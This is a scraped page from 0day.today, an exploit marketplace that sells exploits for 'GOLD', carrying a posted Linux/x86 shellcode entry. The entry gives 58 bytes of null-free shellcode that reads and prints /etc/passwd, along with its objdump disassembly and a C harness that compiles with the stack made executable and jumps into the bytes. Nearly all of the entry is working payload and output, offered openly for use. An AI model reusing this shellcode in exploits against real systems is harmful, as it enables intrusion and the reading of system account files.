0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Linux/x86 Read /etc/passwd Shellcode 58 bytes
[/*
# Shellcode Title: Linux/x86 - Read File (/etc/passwd) (58 bytes). NULL byte free
# Author: Kiewicz (@_Kiewicz)
# Homepage: https://0xkiewicz.github.io
# Tested on: Debian/x86
# gcc -o shellcode -z execstack -fno-stack-protector shellcode.c
# PA-7854
*/
/******************************************************************
$ objdump -d -M intel read_file
read_file: file format elf32-i386
Disassembly of section .text:
08048060 <_start>:
8048060: eb 28 jmp 804808a <read_file>
08048062 <open>:
8048062: 5b pop ebx
8048063: 31 c9 xor ecx,ecx
8048065: f7 e1 mul ecx
8048067: 99 cdq
8048068: b0 05 mov al,0x5
804806a: cd 80 int 0x80
0804806c <read>:
804806c: 89 c3 mov ebx,eax
804806e: b0 03 mov al,0x3
8048070: 89 e7 mov edi,esp
8048072: 89 f9 mov ecx,edi
8048074: 31 d2 xor edx,edx
8048076: b2 ff mov dl,0xff
8048078: cd 80 int 0x80
0804807a <write>:
804807a: 89 c2 mov edx,eax
804807c: 31 c0 xor eax,eax
804807e: b0 04 mov al,0x4
8048080: 31 db xor ebx,ebx
8048082: b3 01 mov bl,0x1
8048084: cd 80 int 0x80
08048086 <exit>:
8048086: b0 01 mov al,0x1
8048088: cd 80 int 0x80
0804808a <read_file>:
804808a: e8 d3 ff ff ff call 8048062 <open>
0804808f <filetoread>:
804808f: 2f das
8048090: 65 74 63 gs je 80480f6 <filetoread+0x67>
8048093: 2f das
8048094: 70 61 jo 80480f7 <filetoread+0x68>
8048096: 73 73 jae 804810b <filetoread+0x7c>
8048098: 77 64 ja 80480fe <filetoread+0x6f>
******************************************************************/
#include<stdio.h>
#include<string.h>
unsigned char code[] = "\xeb\x28\x5b\x31\xc9\xf7\xe1\x99\xb0\x05\xcd\x80\x89\xc3\xb0\x03\x89\xe7\x89\xf9\x31\xd2\xb2\xff\xcd\x80\x89\xc2\x31\xc0\xb0\x04\x31\xdb\xb3\x01\xcd\x80\xb0\x01\xcd\x80\xe8\xd3\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64";
int main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
return 0;
}
# 0day.today [2024-06-27] #